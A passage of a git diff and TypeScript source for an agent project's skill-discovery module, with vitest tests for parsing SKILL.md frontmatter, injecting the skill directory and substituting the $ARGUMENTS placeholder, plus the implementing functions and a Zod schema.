000000000..ac6d646bb --- /dev/null +++ b/lib/skills/__tests__/injectSkillDirectory.test.ts @@ -0,0 +1,14 @@ +import { describe, it, expect } from "vitest"; +import { injectSkillDirectory } from "@/lib/skills/injectSkillDirectory"; + +describe("injectSkillDirectory", () => { + it("prepends a `Skill directory: ` header followed by a blank line", () => { + expect(injectSkillDirectory("body content", "/skills/foo")).toBe( + "Skill directory: /skills/foo\n\nbody content", + ); + }); + + it("works with empty body", () => { + expect(injectSkillDirectory("", "/skills/foo")).toBe("Skill directory: /skills/foo\n\n"); + }); +}); diff --git a/lib/skills/__tests__/parseSkillFrontmatter.test.ts b/lib/skills/__tests__/parseSkillFrontmatter.test.ts new file mode 100644 index 000000000..91dfcf7c1 --- /dev/null +++ b/lib/skills/__tests__/parseSkillFrontmatter.test.ts @@ -0,0 +1,56 @@ +import { describe, it, expect } from "vitest"; +import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter"; + +describe("parseSkillFrontmatter", () => { + it("parses a minimal frontmatter (name + description)", () => { + const md = `---\nname: commit\ndescription: Make a git commit\n---\n\nBody.`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.name).toBe("commit"); + expect(result.data.description).toBe("Make a git commit"); + }); + + it("unwraps double-quoted values (including escaped quotes)", () => { + const md = `---\nname: foo\ndescription: "Has \\"quotes\\" inside"\n---\nbody`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.description).toBe('Has "quotes" inside'); + }); + + it("parses booleans for unquoted true/false", () => { + const md = `---\nname: foo\ndescription: bar\ndisable-model-invocation: true\nuser-invocable: false\n---\nbody`; + const result = parseSkillFrontmatter(md); + 
expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data["disable-model-invocation"]).toBe(true); + expect(result.data["user-invocable"]).toBe(false); + }); + + it("treats `true`/`false` inside quotes as strings (not booleans)", () => { + const md = `---\nname: foo\ndescription: "true"\n---\nbody`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.description).toBe("true"); + }); + + it("returns success:false when frontmatter is missing", () => { + const result = parseSkillFrontmatter("just markdown, no frontmatter"); + expect(result.success).toBe(false); + }); + + it("returns success:false when required fields are absent", () => { + const result = parseSkillFrontmatter(`---\nname: only-name\n---\nbody`); + expect(result.success).toBe(false); + }); + + it("preserves colons in values (e.g. URLs)", () => { + const md = `---\nname: foo\ndescription: see https://example.com\n---\nbody`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.description).toBe("see https://example.com"); + }); +}); diff --git a/lib/skills/__tests__/substituteArguments.test.ts b/lib/skills/__tests__/substituteArguments.test.ts new file mode 100644 index 000000000..db4fb0aa9 --- /dev/null +++ b/lib/skills/__tests__/substituteArguments.test.ts @@ -0,0 +1,22 @@ +import { describe, it, expect } from "vitest"; +import { substituteArguments } from "@/lib/skills/substituteArguments"; + +describe("substituteArguments", () => { + it("replaces $ARGUMENTS with the provided args", () => { + expect(substituteArguments("run with $ARGUMENTS", "--flag value")).toBe( + "run with --flag value", + ); + }); + + it("replaces all occurrences", () => { + expect(substituteArguments("$ARGUMENTS / $ARGUMENTS", "x")).toBe("x / x"); + }); + + it("substitutes empty string when args are undefined", () => { + 
expect(substituteArguments("run with $ARGUMENTS", undefined)).toBe("run with "); + }); + + it("leaves text unchanged when $ARGUMENTS is absent", () => { + expect(substituteArguments("no placeholder here", "ignored")).toBe("no placeholder here"); + }); +}); diff --git a/lib/skills/discoverSkills.ts b/lib/skills/discoverSkills.ts new file mode 100644 index 000000000..9ae0ced67 --- /dev/null +++ b/lib/skills/discoverSkills.ts @@ -0,0 +1,89 @@ +import * as path from "path"; +import type { Sandbox } from "@/lib/sandbox/interface"; +import { findSkillFile } from "@/lib/skills/findSkillFile"; +import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter"; +import { frontmatterToOptions, type SkillMetadata } from "@/lib/skills/skillTypes"; + +/** + * Built-in commands that skills cannot shadow. Skills with these names + * would be unreachable via slash command, so we drop them at discovery. + */ +const BUILTIN_COMMANDS = ["model", "resume", "new"]; + +/** + * Scan a list of directories for skills. Each directory is expected to + * contain one subdirectory per skill, with a SKILL.md (or skill.md) + * inside. Returns metadata for everything discoverable; silently skips + * non-directories, missing files, malformed frontmatter, and names that + * shadow built-in slash commands. + * + * Dedupes by name (case-insensitive); first-wins across directories so + * callers can list project skills before global skills and have project + * shadow global. + * + * @param sandbox - Connected sandbox for file ops. + * @param directories - Absolute paths to scan. 
/**
 * Scan `directories` in order and collect metadata for every skill found.
 *
 * Each directory is expected to contain one subdirectory per skill holding a
 * `SKILL.md` (or `skill.md`). Anything that cannot become a skill is skipped
 * without failing the scan: directories that are missing or cannot be listed,
 * non-directory entries, subdirectories with no skill file, skill files that
 * cannot be read, and frontmatter that fails validation. Names listed in
 * `BUILTIN_COMMANDS` are skipped with a warning.
 *
 * Names are deduplicated case-insensitively and the first occurrence wins, so
 * directories listed earlier shadow later ones.
 *
 * @param sandbox - Connected sandbox used for `stat`, `readdir` and `readFile`.
 * @param directories - Absolute sandbox paths to scan, highest priority first.
 * @returns Metadata for each discovered skill, in discovery order.
 */
export async function discoverSkills(
  sandbox: Sandbox,
  directories: string[],
): Promise<SkillMetadata[]> {
  const skills: SkillMetadata[] = [];
  const seen = new Set<string>();

  for (const dir of directories) {
    try {
      const stat = await sandbox.stat(dir);
      if (!stat.isDirectory()) continue;
    } catch {
      continue; // directory doesn't exist
    }

    let entries;
    try {
      entries = await sandbox.readdir(dir, { withFileTypes: true });
    } catch {
      continue; // directory exists but could not be listed
    }

    for (const entry of entries) {
      if (!entry.isDirectory()) continue;

      // Sandbox paths are POSIX paths; join them with the POSIX separator
      // explicitly (as getGlobalSkillsDirectory does) instead of the host
      // OS separator that plain `path.join` would use.
      const skillDir = path.posix.join(dir, entry.name);
      const skillFile = await findSkillFile(sandbox, skillDir);
      if (!skillFile) continue;

      let content: string;
      try {
        content = await sandbox.readFile(skillFile, "utf-8");
      } catch {
        continue; // skill file vanished or is unreadable
      }

      const parsed = parseSkillFrontmatter(content);
      if (!parsed.success) continue;
      const frontmatter = parsed.data;

      // One case-folded key serves both the built-in check and the dedupe.
      const normalized = frontmatter.name.toLowerCase();

      if (BUILTIN_COMMANDS.includes(normalized)) {
        console.warn(
          `[discoverSkills] Skipping "${frontmatter.name}" in ${skillDir} — name shadows built-in /${frontmatter.name}`,
        );
        continue;
      }

      // First occurrence wins; later duplicates are dropped.
      if (seen.has(normalized)) continue;
      seen.add(normalized);

      skills.push({
        name: frontmatter.name,
        description: frontmatter.description,
        path: skillDir,
        filename: path.basename(skillFile),
        options: frontmatterToOptions(frontmatter),
      });
    }
  }

  return skills;
}
/**
 * Strip the leading YAML frontmatter block (`---` … `---`) from SKILL.md
 * content and return the remaining markdown, trimmed. When the content does
 * not start with a frontmatter block the whole content is returned, trimmed.
 * Both LF and CRLF line endings are accepted around the delimiters.
 *
 * @param fileContent - Full file content read from the sandbox.
 * @returns The markdown body without frontmatter or surrounding whitespace.
 */
export function extractSkillBody(fileContent: string): string {
  const frontmatter = /^---\r?\n[\s\S]*?\r?\n---\r?\n?/.exec(fileContent);
  const body = frontmatter ? fileContent.slice(frontmatter[0].length) : fileContent;
  return body.trim();
}

/**
 * Locate the skill file inside a candidate skill directory.
 *
 * Probes `SKILL.md` first and falls back to lowercase `skill.md`. Each probe
 * uses `sandbox.access`, which is expected to reject when the path is
 * missing; a rejection just moves on to the next candidate.
 *
 * Candidate paths are built with `path.posix.join` because they are sandbox
 * paths, matching how `getGlobalSkillsDirectory` builds them.
 *
 * @param sandbox - Connected sandbox handle.
 * @param skillDir - Absolute sandbox path to the candidate skill directory.
 * @returns The path of the first candidate that exists, or `null` when
 *   neither casing is present.
 */
export async function findSkillFile(sandbox: Sandbox, skillDir: string): Promise<string | null> {
  // Order matters: the uppercase name wins when both exist.
  for (const filename of ["SKILL.md", "skill.md"]) {
    const candidate = path.posix.join(skillDir, filename);
    try {
      await sandbox.access(candidate);
      return candidate;
    } catch {
      // not present under this casing — try the next one
    }
  }
  return null;
}
/**
 * Build the absolute path of the global skills directory under a given
 * `$HOME`, i.e. `<homeDirectory>/.agents/skills`. Per the original note this
 * is where `installSessionGlobalSkills` lays down skills at sandbox
 * provisioning time via `npx skills add ... -g` (today: `recoup-api`,
 * `artist-workspace`).
 *
 * The path is joined with POSIX separators, so a trailing slash on the input
 * is normalized away.
 *
 * @param homeDirectory - The sandbox's resolved $HOME (e.g.
 *   `/home/vercel-sandbox`, or `/root` on the open-agents base image).
 * @returns The POSIX path `<homeDirectory>/.agents/skills`.
 */
export function getGlobalSkillsDirectory(homeDirectory: string): string {
  const segments = [homeDirectory, ".agents", "skills"];
  return path.posix.join(...segments);
}

/**
 * List the directories to scan when discovering skills for a sandbox.
 * Currently a single entry — the global skills directory under the sandbox's
 * resolved home directory.
 *
 * @param sandbox - Connected sandbox handle.
 * @returns A one-element array holding the global skills directory.
 */
export async function getSandboxSkillDirectories(sandbox: Sandbox): Promise<string[]> {
  const globalDirectory = getGlobalSkillsDirectory(await resolveSandboxHomeDirectory(sandbox));
  return [globalDirectory];
}
/**
 * Read the discovered skill catalog out of the agent's
 * `experimental_context`.
 *
 * Returns `[]` when the value is not an agent context (per `isAgentContext`),
 * when it carries no `skills` field, or when `skills` is present but is not
 * an array. The array check means callers can call `.find` / `.map` on the
 * result without re-validating it.
 *
 * @param experimental_context - Opaque context object passed by the AI SDK to
 *   a tool's `execute`.
 * @returns The skill catalog, or an empty array when none is available.
 */
export function getSkills(experimental_context: unknown): SkillMetadata[] {
  if (!isAgentContext(experimental_context)) return [];
  const { skills } = experimental_context as { skills?: unknown };
  // Guard the shape instead of trusting the cast: a non-array here would
  // otherwise surface later as a TypeError inside the caller.
  return Array.isArray(skills) ? skills : [];
}

/**
 * Prepend a `Skill directory: <skillDir>` header and a blank line to a skill
 * body, so the reader of the body can build full paths to files that live
 * next to SKILL.md (e.g. `<skillDir>/scripts/check.sh`).
 *
 * @param body - Skill body (after the frontmatter has been stripped).
 * @param skillDir - Absolute sandbox path to the skill directory.
 * @returns The header, a blank line, then `body` unchanged.
 */
export function injectSkillDirectory(body: string, skillDir: string): string {
  return `Skill directory: ${skillDir}\n\n${body}`;
}
/**
 * Decode one raw (already trimmed) frontmatter value.
 *
 * A value wrapped in double or single quotes is unwrapped and its escaped
 * quote characters are restored; an unquoted `true` / `false` becomes a
 * boolean; anything else is returned unchanged.
 */
function decodeFrontmatterValue(raw: string): string | boolean {
  if (raw.startsWith('"') && raw.endsWith('"')) {
    return raw.slice(1, -1).replace(/\\"/g, '"');
  }
  if (raw.startsWith("'") && raw.endsWith("'")) {
    return raw.slice(1, -1).replace(/\\'/g, "'");
  }
  if (raw === "true") return true;
  if (raw === "false") return false;
  return raw;
}

/**
 * Parse the frontmatter block at the top of SKILL.md content and validate it
 * with `skillFrontmatterSchema`, returning that schema's `safeParse` result.
 *
 * Only a small subset of YAML is understood: one `key: value` pair per line,
 * optional `"…"` / `'…'` quoting, and unquoted `true` / `false`. Blank lines,
 * lines starting with `#`, and lines without a colon are ignored. When the
 * content has no (or an empty) frontmatter block a `success: false` result
 * carrying a plain `Error("No frontmatter found")` is returned instead.
 *
 * @param content - Full SKILL.md content (including the leading `---`).
 * @returns The `safeParse` result for the collected key/value pairs.
 */
export function parseSkillFrontmatter(
  content: string,
): ReturnType<typeof skillFrontmatterSchema.safeParse> {
  const block = /^---\r?\n([\s\S]*?)\r?\n---/.exec(content)?.[1];
  if (!block) {
    return {
      success: false,
      error: new Error("No frontmatter found") as never,
    };
  }

  const fields: Record<string, string | boolean> = {};

  for (const rawLine of block.split("\n")) {
    const line = rawLine.trim();
    if (line === "" || line.startsWith("#")) continue;

    // Split on the first colon only so values such as URLs stay intact.
    const separator = line.indexOf(":");
    if (separator < 0) continue;

    const key = line.slice(0, separator).trim();
    fields[key] = decodeFrontmatterValue(line.slice(separator + 1).trim());
  }

  return skillFrontmatterSchema.safeParse(fields);
}
/** Optional string field carrying the given schema description. */
const optionalText = (description: string) => z.string().optional().describe(description);

/** Optional boolean field carrying the given schema description. */
const optionalFlag = (description: string) => z.boolean().optional().describe(description);

/**
 * Zod schema for the frontmatter at the top of a SKILL.md file. `name` and
 * `description` are required and must be non-empty; every other field is
 * optional.
 */
export const skillFrontmatterSchema = z.object({
  name: z.string().min(1, "Skill name cannot be empty").describe("Unique name of the skill"),
  description: z
    .string()
    .min(1, "Skill description cannot be empty")
    .describe("Short description for the agent"),
  version: optionalText("Skill version"),
  "disable-model-invocation": optionalFlag(
    "If true, the model cannot invoke this skill automatically",
  ),
  "user-invocable": optionalFlag("If false, users cannot invoke this skill via slash command"),
  "allowed-tools": optionalText("Comma-separated list of allowed tools when skill is active"),
  context: z.enum(["fork"]).optional().describe("Execution context for the skill"),
  agent: optionalText("Agent type to use for execution"),
});

/** Validated frontmatter, with the kebab-case keys exactly as written in SKILL.md. */
export type SkillFrontmatter = z.infer<typeof skillFrontmatterSchema>;

/**
 * Skill options derived from frontmatter: the same settings under camelCase
 * names, with the comma-separated tool list already split into an array.
 */
export interface SkillOptions {
  disableModelInvocation?: boolean;
  userInvocable?: boolean;
  allowedTools?: string[];
  context?: "fork";
  agent?: string;
}

/**
 * Catalog entry for one discovered skill. It carries the location of the
 * skill file rather than its contents.
 */
export interface SkillMetadata {
  /** Unique name of the skill. */
  name: string;
  /** Short description for the agent. */
  description: string;
  /** Absolute sandbox path to the skill directory. */
  path: string;
  /** Filename of the skill file (`SKILL.md` or `skill.md`). */
  filename: string;
  /** Skill options from frontmatter. */
  options: SkillOptions;
}
/**
 * Convert validated frontmatter into {@link SkillOptions}: kebab-case keys
 * become camelCase, and the comma-separated `allowed-tools` string is split
 * into a list with surrounding whitespace and empty items removed. Fields
 * absent from the frontmatter come through as `undefined`.
 *
 * @param frontmatter - Frontmatter that already passed schema validation.
 * @returns The equivalent options object.
 */
export function frontmatterToOptions(frontmatter: SkillFrontmatter): SkillOptions {
  return {
    disableModelInvocation: frontmatter["disable-model-invocation"],
    userInvocable: frontmatter["user-invocable"],
    allowedTools: frontmatter["allowed-tools"]
      ?.split(",")
      .map(t => t.trim())
      .filter(Boolean),
    context: frontmatter.context,
    agent: frontmatter.agent,
  };
}

/**
 * Replace every occurrence of `$ARGUMENTS` in a skill body with the provided
 * args string (or with the empty string when no args were passed).
 *
 * The args are inserted verbatim. A replacer function is used because a
 * string replacement would make `String.prototype.replace` interpret
 * sequences such as `$&`, `$$`, `$1`, `` $` `` and `$'` inside `args`, so
 * arguments containing a dollar sign would be silently rewritten.
 *
 * @param body - Skill body (markdown after frontmatter).
 * @param args - Optional arguments passed by the model.
 * @returns `body` with all `$ARGUMENTS` placeholders substituted.
 */
export function substituteArguments(body: string, args?: string): string {
  const replacement = args ?? "";
  return body.replace(/\$ARGUMENTS/g, () => replacement);
}